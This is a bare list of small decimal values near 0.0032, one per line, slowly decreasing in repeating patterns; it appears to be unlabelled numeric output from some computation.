0.00335066
0.00334437
0.00335685
0.00336308
0.00335687
0.00336292
0.00335701
0.00335692
0.00335735
0.00336306
0.00336328
0.003357
0.00336298
0.00335722
0.00335032
0.00334447
0.00335032
0.00335049
0.00334429
0.00333191
0.00333794
0.00333814
0.00333229
0.00333787
0.00333198
0.00333218
0.00332539
0.00332543
0.00331966
0.00331946
0.00332559
0.00333183
0.00333799
0.00333188
0.0033378
0.00333202
0.00332547
0.00332582
0.00331961
0.0033198
0.00331955
0.00332553
0.00332572
0.00333191
0.00333794
0.00333814
0.00333229
0.00333787
0.00333198
0.00333218
0.00332539
0.00332543
0.00331966
0.00332559
0.00331946
0.00333183
0.00333799
0.00333188
0.0033378
0.00333202
0.00332547
0.00332582
0.00331961
0.0033198
0.00332553
0.00332572
0.00331955
0.00335042
0.00334416
0.00334416
0.00335018
0.00335018
0.00334439
0.00335704
0.00336299
0.0033628
0.00335709
0.0033568
0.00336304
0.00335702
0.00335704
0.00336299
0.0033628
0.00335708
0.00335702
0.00336304
0.00335679
0.00335692
0.00336276
0.00336276
0.0033567
0.003363
0.0033567
0.00335046
0.00334426
0.00335054
0.00334449
0.00335023
0.00335042
0.0033445
0.00335046
0.00334426
0.00335054
0.00334449
0.00335042
0.00335023
0.0033445
0.00335674
0.00335021
0.00332534
0.00333176
0.00333195
0.0033377
0.0033377
0.00333793
0.00333173
0.00333173
0.00332558
0.00331972
0.00332563
0.00331949
0.00332555
0.00332536
0.00331972
0.00332558
0.00331972
0.00332563
0.00331949
0.00332536
0.00332554
0.00331972
0.00333206
0.00333774
0.00333793
0.00333208
0.00333206
0.00333797
0.00333183
0.00333206
0.00333774
0.00333793
0.00333208
0.00333797
0.00333183
0.00333206
0.00332555
0.00331938
0.00331938
0.00332531
0.00332531
0.00331961
0.00332533
0.00333176
0.00335038
0.00335078
0.00334444
0.00334465
0.00335045
0.00335066
0.00334437
0.00335685
0.00336308
0.00335687
0.00336292
0.00335701
0.00335692
0.00335734
0.00336305
0.00336328
0.003357
0.00336298
0.00335722
0.00335031
0.00334447
0.00335032
0.00335048
0.00334429
0.00333191
0.00333814
0.00333794
0.00333229
0.00333788
0.00333218
0.00333198
0.00332539
0.00332543
0.00331966
0.00331946
0.00332559
0.00333183
0.00333799
0.00333188
0.0033378
0.00333202
0.00332547
0.00332582
0.0033198
0.00331961
0.00331955
0.00332572
0.00332553
0.00333191
0.00333794
0.00333814
0.00333229
0.00333787
0.00333198
0.00333218
0.00332539
0.00332543
0.00331966
0.00332559
0.00331946
0.00333183
0.00333799
0.00333188
0.0033378
0.00333202
0.00332547
0.00332582
0.00331961
0.0033198
0.00332553
0.00332572
0.00331955
0.00335038
0.00335078
0.00334465
0.00334444
0.00335066
0.00335045
0.00334437
0.00335685
0.00336308
0.00335687
0.00335701
0.00336292
0.00335692
0.00335735
0.00336328
0.00336305
0.00335722
0.00336298
0.003357
0.00335031
0.00334447
0.00335032
0.00335048
0.00334429
0.00335038
0.00335078
0.00334444
0.00334465
0.00335045
0.00335066
0.00334437
0.00335685
0.00336308
0.00335687
0.00336292
0.00335701
0.00335692
0.00335735
0.00336305
0.00336328
0.00336298
0.003357
0.00335722
0.00335031
0.00334447
0.00335032
0.00335048
0.00334429
0.00333191
0.00333814
0.00333794
0.00333229
0.00333787
0.00333218
0.00333198
0.00332539
0.00332543
0.00331966
0.00332559
0.00331946
0.00333183
0.00333799
0.00333188
0.0033378
0.00333202
0.00332547
0.00332582
0.0033198
0.00331961
0.00332572
0.00332553
0.00331955
0.00333191
0.00333794
0.00333814
0.00333229
0.00333787
0.00333198
0.00333218
0.00332539
0.00332543
0.00331966
0.00332559
0.00331946
0.00333183
0.00333799
0.00333188
0.0033378
0.00333202
0.00332547
0.00332582
0.00331961
0.0033198
0.00332553
0.00332572
0.00331955
0.00335042
0.00334416
0.00334416
0.00335018
0.00335018
0.00334439
0.00335703
0.00336299
0.0033628
0.00335708
0.00335679
0.00336304
0.00335702
0.00335703
0.00336299
0.0033628
0.00335708
0.00335702
0.00336304
0.00335679
0.00335692
0.00336276
0.00336276
0.00335669
0.003363
0.00335669
0.00335046
0.00334426
0.00335054
0.00334449
0.00335023
0.00335042
0.0033445
0.00335046
0.00334426
0.00335054
0.00334449
0.00335042
0.00335023
0.0033445
0.00335674
0.00335021
0.00332533
0.00333176
0.00333195
0.0033377
0.0033377
0.00333793
0.00333173
0.00333173
0.00332558
0.00331971
0.00332563
0.00331949
0.00332554
0.00332535
0.00331972
0.00332558
0.00331971
0.00332563
0.00331949
0.00332535
0.00332554
0.00331972
0.00333206
0.00333774
0.00333793
0.00333208
0.00333206
0.00333797
0.00333183
0.00333206
0.00333774
0.00333793
0.00333208
0.00333797
0.00333183
0.00333206
0.00332555
0.00331938
0.00331938
0.00332531
0.00332531
0.00331961
0.00332533
0.00333176
0.00335038
0.00335078
0.00334465
0.00334444
0.00335066
0.00335045
0.00334437
0.00335685
0.00336308
0.00335687
0.00335701
0.00336292
0.00335692
0.00335734
0.00336328
0.00336305
0.00335722
0.00336298
0.003357
0.00335031
0.00334447
0.00335032
0.00335048
0.00334429
0.00335038
0.00335078
0.00334465
0.00334444
0.00335066
0.00335045
0.00334437
0.00335685
0.00336308
0.00335687
0.00336292
0.00335701
0.00335692
0.00335734
0.00336328
0.00336305
0.00336298
0.00335722
0.003357
0.00335031
0.00334446
0.00335032
0.00335048
0.00334429
0.00333191
0.00333814
0.00333794
0.00333228
0.00333787
0.00333218
0.00333198
0.00332539
0.00332543
0.00331966
0.00332559
0.00331946
0.00333183
0.00333799
0.00333188
0.0033378
0.00333202
0.00332547
0.00332582
0.0033198
0.00331961
0.00332572
0.00332553
0.00331955
0.00333191
0.00333814
0.00333794
0.00333228
0.00333787
0.00333218
0.00333198
0.00332539
0.00332543
0.00331966
0.00332559
0.00331945
0.00333182
0.00333799
0.00333188
0.0033378
0.00333201
0.00332547
0.00332582
0.0033198
0.00331961
0.00332572
0.00332553
0.00331955
0.00335674
0.00335021
0.00335674
0.00335021
0.00333195
0.0033377
0.0033377
0.00333793
0.00333173
0.00333173
0.00332558
0.00331971
0.00332563
0.00331949
0.00331972
0.00332555
0.00332535
0.00332558
0.00331971
0.00332563
0.00331949
0.00331972
0.00332554
0.00332535
0.00333206
0.00333774
0.00333793
0.00333208
0.00333797
0.00333206
0.00333183
0.00333206
0.00333774
0.00333793
0.00333208
0.00333797
0.00333206
0.00333183
0.00332555
0.00331938
0.00331938
0.00331961
0.00332531
0.00332531
0.00332533
0.00333176
0.00332533
0.00333176
0.00330716
0.00330083
0.00330716
0.00330083
0.00330105
0.00329496
0.00329496
0.00330081
0.00330081
0.0032952
0.00330746
0.00331325
0.00331306
0.00330746
0.00331328
0.00330724
0.00330746
0.00330746
0.00331325
0.00331306
0.00330746
0.00331328
0.00330724
0.00330746
0.00330736
0.00331301
0.00331301
0.00331325
0.00330713
0.00330713
0.00330107
0.00329507
0.0033011
0.0032953
0.00330085
0.0032953
0.00330104
0.00330107
0.00329507
0.0033011
0.0032953
0.00330085
0.0032953
0.00330104
0.00327668
0.00328292
0.00327668
0.00328292
0.00328313
0.00328869
0.00328869
0.00328893
0.00328288
0.00328288
0.00327692
0.00327124
0.00327693
0.00327102
0.00327671
0.00327689
0.00327124
0.00327692
0.00327124
0.00327693
0.00327102
0.00327671
0.00327689
0.00327124
0.00328323
0.00328874
0.00328892
0.0032832
0.00328895
0.003283
0.00328323
0.00328323
0.00328874
0.00328892
0.0032832
0.00328895
0.003283
0.00328323
0.0032769
0.00327089
0.00327089
0.00327665
0.00327665
0.00327114
0.00330093
0.00330124
0.00329516
0.00329534
0.00330099
0.00330116
0.0032951
0.00330718
0.00331328
0.00330728
0.00331307
0.0033074
0.00330728
0.00330761
0.00331321
0.00331339
0.00330734
0.00331315
0.00330752
0.00330084
0.00329523
0.00330091
0.00330106
0.00329499
0.00328301
0.00328885
0.00328901
0.00328331
0.0032888
0.00328307
0.00328324
0.00327665
0.00327676
0.00327116
0.0032709
0.00327691
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327107
0.00327124
0.00327102
0.0032768
0.00327696
0.00328301
0.00328885
0.00328901
0.00328331
0.0032888
0.00328307
0.00328324
0.00327665
0.00327676
0.00327116
0.00327691
0.00327089
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327107
0.00327123
0.0032768
0.00327696
0.00327102
0.00330104
0.00329496
0.00329496
0.0033008
0.00330081
0.0032952
0.00330747
0.00331325
0.00331306
0.00330746
0.00330724
0.00331328
0.00330746
0.00330746
0.00331325
0.00331306
0.00330746
0.00330746
0.00331328
0.00330724
0.00330736
0.00331301
0.00331301
0.00330713
0.00331325
0.00330713
0.00330107
0.00329507
0.00330109
0.0032953
0.00330085
0.00330104
0.0032953
0.00330107
0.00329507
0.0033011
0.0032953
0.00330104
0.00330085
0.0032953
0.00330716
0.00330083
0.00327667
0.00328292
0.00328313
0.00328868
0.00328868
0.00328893
0.00328288
0.00328288
0.00327692
0.00327124
0.00327693
0.00327101
0.00327689
0.00327671
0.00327124
0.00327692
0.00327124
0.00327693
0.00327102
0.00327671
0.00327689
0.00327124
0.00328323
0.00328873
0.00328892
0.0032832
0.00328323
0.00328895
0.003283
0.00328323
0.00328874
0.00328892
0.0032832
0.00328895
0.003283
0.00328323
0.0032769
0.00327089
0.00327089
0.00327665
0.00327665
0.00327114
0.00327668
0.00328292
0.00330093
0.00330124
0.00329516
0.00329534
0.00330099
0.00330116
0.0032951
0.00330718
0.00331328
0.00330727
0.00331307
0.0033074
0.00330728
0.00330761
0.00331321
0.00331339
0.00330734
0.00331315
0.00330752
0.00330084
0.00329523
0.00330091
0.00330106
0.00329499
0.00328302
0.00328902
0.00328885
0.00328331
0.0032888
0.00328324
0.00328307
0.00327666
0.00327676
0.00327116
0.00327089
0.00327691
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327124
0.00327107
0.00327102
0.00327696
0.0032768
0.00328302
0.00328885
0.00328902
0.00328331
0.0032888
0.00328307
0.00328324
0.00327665
0.00327676
0.00327116
0.00327691
0.00327089
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327107
0.00327124
0.0032768
0.00327696
0.00327102
0.00330093
0.00330124
0.00329534
0.00329516
0.00330116
0.00330099
0.0032951
0.00330718
0.00331328
0.00330727
0.0033074
0.00331307
0.00330728
0.00330761
0.00331339
0.00331321
0.00330752
0.00331315
0.00330734
0.00330084
0.00329523
0.00330092
0.00330107
0.00329499
0.00330093
0.00330124
0.00329516
0.00329534
0.00330099
0.00330116
0.00329511
0.00330718
0.00331328
0.00330727
0.00331307
0.0033074
0.00330728
0.00330761
0.00331321
0.00331339
0.00331315
0.00330734
0.00330752
0.00330084
0.00329523
0.00330092
0.00330107
0.003295
0.00328302
0.00328902
0.00328885
0.00328331
0.0032888
0.00328324
0.00328307
0.00327666
0.00327676
0.00327116
0.00327691
0.0032709
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327124
0.00327107
0.00327697
0.00327681
0.00327102
0.00328302
0.00328885
0.00328902
0.00328331
0.0032888
0.00328307
0.00328324
0.00327666
0.00327676
0.00327116
0.00327691
0.0032709
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327107
0.00327124
0.00327681
0.00327697
0.00327102
0.00330105
0.00329496
0.00329496
0.00330081
0.00330081
0.0032952
0.00330746
0.00331325
0.00331306
0.00330746
0.00330724
0.00331328
0.00330746
0.00330746
0.00331325
0.00331306
0.00330746
0.00330746
0.00331328
0.00330724
0.00330736
0.00331301
0.00331301
0.00330713
0.00331325
0.00330713
0.00330107
0.00329507
0.0033011
0.0032953
0.00330085
0.00330104
0.0032953
0.00330107
0.00329507
0.0033011
0.0032953
0.00330104
0.00330085
0.0032953
0.00330716
0.00330082
0.00327668
0.00328292
0.00328313
0.00328869
0.00328869
0.00328893
0.00328288
0.00328288
0.00327692
0.00327124
0.00327693
0.00327101
0.00327689
0.00327671
0.00327124
0.00327692
0.00327124
0.00327693
0.00327102
0.00327671
0.00327689
0.00327124
0.00328323
0.00328874
0.00328892
0.0032832
0.00328323
0.00328895
0.003283
0.00328323
0.00328874
0.00328892
0.0032832
0.00328895
0.003283
0.00328323
0.0032769
0.00327089
0.00327089
0.00327665
0.00327665
0.00327114
0.00327668
0.00328292
0.00330093
0.00330124
0.00329534
0.00329516
0.00330116
0.00330098
0.0032951
0.00330718
0.00331328
0.00330727
0.0033074
0.00331307
0.00330728
0.00330761
0.00331339
0.00331321
0.00330752
0.00331315
0.00330734
0.00330084
0.00329523
0.00330092
0.00330106
0.00329499
0.00330093
0.00330124
0.00329534
0.00329516
0.00330116
0.00330098
0.0032951
0.00330718
0.00331328
0.00330727
0.00331307
0.0033074
0.00330728
0.00330761
0.00331339
0.00331321
0.00331315
0.00330752
0.00330734
0.00330084
0.00329523
0.00330092
0.00330106
0.00329499
0.00328301
0.00328902
0.00328885
0.00328331
0.0032888
0.00328324
0.00328307
0.00327665
0.00327676
0.00327116
0.00327691
0.0032709
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327124
0.00327107
0.00327697
0.0032768
0.00327102
0.00328302
0.00328902
0.00328885
0.00328331
0.0032888
0.00328324
0.00328307
0.00327666
0.00327676
0.00327116
0.00327691
0.0032709
0.0032829
0.00328894
0.00328303
0.0032887
0.00328315
0.00327676
0.00327703
0.00327124
0.00327107
0.00327697
0.00327681
0.00327102
0.00330716
0.00330083
0.00330716
0.00330083
0.00328313
0.00328869
0.00328869
0.00328893
0.00328288
0.00328288
0.00327692
0.00327124
0.00327694
0.00327102
0.00327124
0.0032769
0.00327671
0.00327692
0.00327124
0.00327694
0.00327102
0.00327124
0.0032769
0.00327671
0.00328323
0.00328874
0.00328892
0.0032832
0.00328895
0.00328323
0.003283
0.00328323
0.00328874
0.00328892
0.0032832
0.00328895
0.00328323
0.003283
0.00327691
0.00327089
0.00327089
0.00327114
0.00327666
0.00327666
0.00327668
0.00328292
0.00327668
0.00328292
0.00325903
0.00325287
0.00325902
0.00325286
0.0032531
0.00324716
0.00324716
0.00325284
0.00325284
0.00324741
0.00325934
0.00326495
0.00326476
0.0032593
0.00326498
0.00325911
0.00325934
0.00325934
0.00326495
0.00326476
0.0032593
0.00326498
0.00325911
0.00325934
0.00325924
0.00326471
0.00326471
0.00326496
0.00325898
0.00325898
0.00325311
0.00324729
0.00325311
0.00324751
0.0032529
0.00324752
0.00325309
0.00325311
0.00324729
0.00325311
0.00324751
0.0032529
0.00324751
0.00325308
0.00322936
0.00323544
0.00322937
0.00323545
0.00323566
0.00324105
0.00324105
0.00324132
0.0032354
0.0032354
0.00322961
0.00322409
0.00322959
0.00322386
0.0032294
0.00322959
0.00322409
0.00322961
0.00322409
0.0032296
0.00322386
0.00322941
0.00322959
0.00322409
0.00323577
0.00324112
0.0032413
0.00323571
0.00324133
0.00323553
0.00323577
0.00323577
0.00324112
0.0032413
0.00323571
0.00324133
0.00323554
0.00323577
0.0032296
0.00322372
0.00322372
0.00322933
0.00322933
0.00322399
0.00325293
0.00325317
0.00324731
0.00324747
0.00325297
0.00325312
0.00324727
0.00325897
0.00326496
0.00325913
0.00326469
0.00325925
0.0032591
0.00325937
0.00326484
0.003265
0.00325915
0.0032648
0.00325931
0.00325281
0.00324742
0.00325294
0.00325309
0.00324713
0.00323551
0.00324117
0.00324132
0.00323575
0.00324114
0.00323555
0.00323571
0.0032293
0.00322944
0.00322399
0.00322369
0.00322959
0.00323537
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322963
0.00322387
0.00322403
0.00322383
0.00322945
0.0032296
0.00323551
0.00324117
0.00324132
0.00323575
0.00324114
0.00323555
0.00323571
0.0032293
0.00322945
0.00322399
0.00322959
0.00322369
0.00323537
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322963
0.00322387
0.00322403
0.00322945
0.0032296
0.00322383
0.0032531
0.00324716
0.00324716
0.00325284
0.00325284
0.00324741
0.00325934
0.00326495
0.00326476
0.00325929
0.00325911
0.00326497
0.00325934
0.00325934
0.00326495
0.00326477
0.0032593
0.00325934
0.00326498
0.00325911
0.00325924
0.00326471
0.00326471
0.00325898
0.00326496
0.00325898
0.00325311
0.00324729
0.00325311
0.00324751
0.0032529
0.00325308
0.00324751
0.00325311
0.00324729
0.00325311
0.00324751
0.00325308
0.0032529
0.00324752
0.00325902
0.00325286
0.00322937
0.00323545
0.00323567
0.00324105
0.00324105
0.00324132
0.0032354
0.0032354
0.00322962
0.00322409
0.0032296
0.00322386
0.00322959
0.00322941
0.00322409
0.00322962
0.00322409
0.0032296
0.00322386
0.00322941
0.00322959
0.0032241
0.00323577
0.00324112
0.0032413
0.00323571
0.00323577
0.00324133
0.00323554
0.00323577
0.00324112
0.0032413
0.00323571
0.00324133
0.00323554
0.00323577
0.00322961
0.00322372
0.00322372
0.00322934
0.00322934
0.00322399
0.00322937
0.00323545
0.00325293
0.00325317
0.00324731
0.00324747
0.00325297
0.00325312
0.00324727
0.00325897
0.00326496
0.00325913
0.00326469
0.00325925
0.0032591
0.00325937
0.00326484
0.003265
0.00325915
0.0032648
0.00325931
0.00325282
0.00324742
0.00325294
0.00325309
0.00324713
0.00323551
0.00324132
0.00324117
0.00323575
0.00324114
0.00323571
0.00323555
0.0032293
0.00322944
0.00322399
0.00322369
0.00322959
0.00323537
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322963
0.00322403
0.00322387
0.00322383
0.0032296
0.00322945
0.00323551
0.00324117
0.00324132
0.00323575
0.00324114
0.00323555
0.00323571
0.0032293
0.00322945
0.00322399
0.00322959
0.00322369
0.00323537
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322963
0.00322387
0.00322403
0.00322945
0.0032296
0.00322383
0.00325293
0.00325317
0.00324748
0.00324731
0.00325312
0.00325297
0.00324727
0.00325897
0.00326496
0.00325913
0.00325925
0.0032647
0.0032591
0.00325937
0.003265
0.00326485
0.00325932
0.0032648
0.00325915
0.00325282
0.00324742
0.00325295
0.00325309
0.00324714
0.00325293
0.00325317
0.00324731
0.00324748
0.00325297
0.00325312
0.00324727
0.00325898
0.00326496
0.00325913
0.0032647
0.00325925
0.0032591
0.00325937
0.00326485
0.003265
0.0032648
0.00325915
0.00325932
0.00325282
0.00324742
0.00325295
0.00325309
0.00324714
0.00323551
0.00324132
0.00324117
0.00323576
0.00324114
0.00323572
0.00323555
0.0032293
0.00322945
0.00322399
0.00322959
0.00322369
0.00323538
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322964
0.00322403
0.00322387
0.0032296
0.00322945
0.00322383
0.00323551
0.00324117
0.00324132
0.00323576
0.00324114
0.00323555
0.00323572
0.0032293
0.00322945
0.00322399
0.00322959
0.00322369
0.00323538
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322963
0.00322387
0.00322403
0.00322945
0.0032296
0.00322383
0.0032531
0.00324715
0.00324715
0.00325284
0.00325284
0.00324741
0.00325934
0.00326495
0.00326476
0.0032593
0.00325911
0.00326497
0.00325934
0.00325934
0.00326495
0.00326476
0.0032593
0.00325934
0.00326497
0.00325911
0.00325924
0.00326471
0.00326471
0.00325898
0.00326496
0.00325898
0.00325311
0.00324729
0.00325311
0.00324751
0.0032529
0.00325308
0.00324751
0.00325311
0.00324729
0.00325311
0.00324751
0.00325308
0.0032529
0.00324751
0.00325902
0.00325286
0.00322937
0.00323545
0.00323567
0.00324105
0.00324105
0.00324131
0.0032354
0.0032354
0.00322962
0.00322409
0.0032296
0.00322386
0.00322959
0.00322941
0.00322409
0.00322962
0.00322409
0.0032296
0.00322386
0.00322941
0.00322959
0.0032241
0.00323577
0.00324112
0.0032413
0.00323571
0.00323577
0.00324133
0.00323554
0.00323577
0.00324112
0.0032413
0.00323571
0.00324133
0.00323554
0.00323577
0.0032296
0.00322372
0.00322372
0.00322934
0.00322934
0.00322399
0.00322937
0.00323545
0.00325293
0.00325317
0.00324747
0.00324731
0.00325312
0.00325297
0.00324727
0.00325897
0.00326496
0.00325913
0.00325925
0.00326469
0.0032591
0.00325937
0.003265
0.00326485
0.00325931
0.0032648
0.00325915
0.00325282
0.00324742
0.00325294
0.00325309
0.00324714
0.00325293
0.00325317
0.00324748
0.00324731
0.00325312
0.00325297
0.00324727
0.00325897
0.00326496
0.00325913
0.0032647
0.00325925
0.0032591
0.00325937
0.003265
0.00326485
0.0032648
0.00325932
0.00325915
0.00325282
0.00324742
0.00325295
0.00325309
0.00324714
0.00323551
0.00324132
0.00324117
0.00323576
0.00324114
0.00323571
0.00323555
0.0032293
0.00322944
0.00322399
0.00322959
0.00322369
0.00323538
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322963
0.00322403
0.00322387
0.0032296
0.00322945
0.00322383
0.00323551
0.00324132
0.00324117
0.00323576
0.00324114
0.00323572
0.00323555
0.0032293
0.00322945
0.00322399
0.00322959
0.00322369
0.00323538
0.0032413
0.00323555
0.00324102
0.00323567
0.00322942
0.00322963
0.00322403
0.00322387
0.0032296
0.00322945
0.00322383
0.00325903
0.00325287
0.00325903
0.00325287
0.00323567
0.00324105
0.00324105
0.00324132
0.0032354
0.0032354
0.00322962
0.00322409
0.0032296
0.00322387
0.0032241
0.00322959
0.00322941
0.00322962
0.00322409
0.0032296
0.00322387
0.0032241
0.00322959
0.00322941
0.00323577
0.00324112
0.0032413
0.00323571
0.00324133
0.00323577
0.00323554
0.00323577
0.00324112
0.0032413
0.00323571
0.00324133
0.00323577
0.00323554
0.00322961
0.00322372
0.00322372
0.00322399
0.00322934
0.00322934
0.00322937
0.00323545
0.00322937
0.00323545
0.00321217
0.00320616
0.00321217
0.00320615
0.00320639
0.00320057
0.00320057
0.00320612
0.00320612
0.00320085
0.00321249
0.00321795
0.00321777
0.00321242
0.00321798
0.00321226
0.00321249
0.00321249
0.00321795
0.00321777
0.00321242
0.00321798
0.00321226
0.00321249
0.00321238
0.00321769
0.00321769
0.00321797
0.00321211
0.00321211
0.00320641
0.00320072
0.00320638
0.00320095
0.0032062
0.00320095
0.00320638
0.00320641
0.00320072
0.00320638
0.00320095
0.0032062
0.00320095
0.00320638
0.0031832
0.00318915
0.00318321
0.00318915
0.00318937
0.00319461
0.00319461
0.00319489
0.00318909
0.00318909
0.00318346
0.00317806
0.00318342
0.00317783
0.00318325
0.00318343
0.00317807
0.00318346
0.00317806
0.00318342
0.00317783
0.00318325
0.00318343
0.00317807
0.00318948
0.00319469
0.00319487
0.0031894
0.0031949
0.00318925
0.00318948
0.00318948
0.00319469
0.00319487
0.0031894
0.0031949
0.00318925
0.00318948
0.00318344
0.00317768
0.00317768
0.00318316
0.00318316
0.00317795
0.0032062
0.00320639
0.00320071
0.00320087
0.00320623
0.00320637
0.00320068
0.00321208
0.00321794
0.00321227
0.00321765
0.00321238
0.00321222
0.00321245
0.0032178
0.00321795
0.00321226
0.00321778
0.00321242
0.00320607
0.00320084
0.00320623
0.00320637
0.00320053
0.0031892
0.00319471
0.00319486
0.00318941
0.00319469
0.00318923
0.00318939
0.00318311
0.00318328
0.00317795
0.00317763
0.00318342
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317781
0.00317797
0.00317779
0.00318327
0.00318341
0.0031892
0.00319471
0.00319486
0.00318941
0.00319469
0.00318923
0.00318939
0.00318311
0.00318328
0.00317795
0.00318342
0.00317763
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317781
0.00317797
0.00318327
0.00318341
0.00317779
0.00320639
0.00320057
0.00320057
0.00320612
0.00320612
0.00320085
0.00321249
0.00321795
0.00321777
0.00321242
0.00321226
0.00321798
0.00321249
0.00321249
0.00321795
0.00321777
0.00321242
0.00321249
0.00321798
0.00321226
0.00321238
0.00321769
0.00321769
0.00321211
0.00321797
0.00321211
0.00320641
0.00320072
0.00320638
0.00320095
0.0032062
0.00320638
0.00320095
0.00320641
0.00320072
0.00320638
0.00320095
0.00320638
0.0032062
0.00320095
0.00321217
0.00320616
0.00318321
0.00318915
0.00318937
0.00319461
0.00319461
0.00319489
0.00318909
0.00318909
0.00318346
0.00317806
0.00318342
0.00317783
0.00318343
0.00318325
0.00317807
0.00318346
0.00317806
0.00318342
0.00317783
0.00318325
0.00318343
0.00317807
0.00318948
0.00319469
0.00319487
0.0031894
0.00318948
0.0031949
0.00318925
0.00318948
0.00319469
0.00319487
0.0031894
0.0031949
0.00318925
0.00318948
0.00318344
0.00317768
0.00317768
0.00318316
0.00318316
0.00317795
0.00318321
0.00318915
0.0032062
0.00320639
0.00320071
0.00320087
0.00320623
0.00320637
0.00320068
0.00321208
0.00321794
0.00321227
0.00321765
0.00321239
0.00321222
0.00321245
0.0032178
0.00321795
0.00321226
0.00321777
0.00321242
0.00320607
0.00320085
0.00320623
0.00320637
0.00320053
0.0031892
0.00319486
0.00319471
0.00318941
0.00319469
0.00318939
0.00318923
0.00318311
0.00318328
0.00317795
0.00317763
0.00318342
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317797
0.00317781
0.00317779
0.00318341
0.00318327
0.0031892
0.00319471
0.00319486
0.00318941
0.00319469
0.00318923
0.00318939
0.00318311
0.00318328
0.00317795
0.00318342
0.00317763
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317781
0.00317797
0.00318327
0.00318341
0.00317779
0.0032062
0.0032064
0.00320087
0.00320071
0.00320637
0.00320623
0.00320068
0.00321208
0.00321795
0.00321227
0.00321239
0.00321765
0.00321222
0.00321245
0.00321795
0.0032178
0.00321242
0.00321778
0.00321226
0.00320607
0.00320085
0.00320623
0.00320637
0.00320053
0.0032062
0.0032064
0.00320071
0.00320087
0.00320623
0.00320637
0.00320068
0.00321208
0.00321795
0.00321227
0.00321765
0.00321239
0.00321222
0.00321245
0.0032178
0.00321795
0.00321778
0.00321226
0.00321242
0.00320607
0.00320085
0.00320623
0.00320637
0.00320053
0.0031892
0.00319486
0.00319472
0.00318941
0.00319469
0.00318939
0.00318923
0.00318311
0.00318328
0.00317795
0.00318342
0.00317763
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317797
0.00317781
0.00318341
0.00318327
0.00317779
0.0031892
0.00319471
0.00319486
0.00318941
0.00319469
0.00318923
0.00318939
0.00318311
0.00318328
0.00317795
0.00318342
0.00317763
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317781
0.00317797
0.00318327
0.00318341
0.00317779
0.00320639
0.00320057
0.00320057
0.00320612
0.00320612
0.00320085
0.00321249
0.00321795
0.00321777
0.00321242
0.00321226
0.00321798
0.00321249
0.00321249
0.00321795
0.00321777
0.00321242
0.00321249
0.00321798
0.00321226
0.00321239
0.00321769
0.00321769
0.00321211
0.00321797
0.00321211
0.00320641
0.00320072
0.00320638
0.00320095
0.0032062
0.00320638
0.00320095
0.00320641
0.00320072
0.00320638
0.00320095
0.00320638
0.0032062
0.00320095
0.00321217
0.00320615
0.00318321
0.00318915
0.00318937
0.00319461
0.00319461
0.00319489
0.00318909
0.00318909
0.00318346
0.00317806
0.00318342
0.00317783
0.00318343
0.00318325
0.00317807
0.00318346
0.00317806
0.00318342
0.00317783
0.00318325
0.00318343
0.00317807
0.00318948
0.00319469
0.00319487
0.0031894
0.00318948
0.0031949
0.00318925
0.00318948
0.00319469
0.00319487
0.0031894
0.0031949
0.00318925
0.00318948
0.00318344
0.00317768
0.00317768
0.00318316
0.00318316
0.00317795
0.0031832
0.00318915
0.0032062
0.0032064
0.00320087
0.00320071
0.00320637
0.00320623
0.00320068
0.00321208
0.00321795
0.00321227
0.00321239
0.00321765
0.00321222
0.00321245
0.00321795
0.0032178
0.00321242
0.00321778
0.00321226
0.00320607
0.00320085
0.00320623
0.00320637
0.00320053
0.0032062
0.0032064
0.00320087
0.00320071
0.00320637
0.00320623
0.00320068
0.00321208
0.00321795
0.00321227
0.00321765
0.00321239
0.00321222
0.00321245
0.00321795
0.0032178
0.00321778
0.00321242
0.00321226
0.00320607
0.00320085
0.00320623
0.00320637
0.00320053
0.0031892
0.00319486
0.00319472
0.00318941
0.00319469
0.00318939
0.00318923
0.00318311
0.00318328
0.00317795
0.00318342
0.00317763
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317797
0.00317781
0.00318341
0.00318327
0.00317779
0.0031892
0.00319486
0.00319472
0.00318941
0.00319469
0.00318939
0.00318923
0.00318311
0.00318328
0.00317795
0.00318342
0.00317763
0.00318905
0.00319486
0.00318926
0.00319456
0.00318937
0.00318325
0.00318342
0.00317797
0.00317781
0.00318341
0.00318327
0.00317779
0.00321217
0.00320616
0.00321217
0.00320616
0.00318937
0.00319461
0.00319461
0.00319489
0.00318909
0.00318909
0.00318346
0.00317806
0.00318342
0.00317783
0.00317807
0.00318343
0.00318325
0.00318346
0.00317806
0.00318342
0.00317783
0.00317807
0.00318343
0.00318325
0.00318948
0.00319469
0.00319487
0.0031894
0.0031949
0.00318948
0.00318925
0.00318948
0.00319469
0.00319487
0.0031894
0.0031949
0.00318948
0.00318925
0.00318344
0.00317768
0.00317768
0.00317795
0.00318316
0.00318316
0.00318321
0.00318915
0.0031832
0.00318915
0.00316638
0.00316049
0.00316638
0.00316049
0.00316073
0.00315501
0.00315501
0.00316045
0.00316045
0.00315529
0.00316671
0.00317204
0.00317186
0.00316662
0.00317207
0.00316648
0.00316671
0.00316671
0.00317204
0.00317186
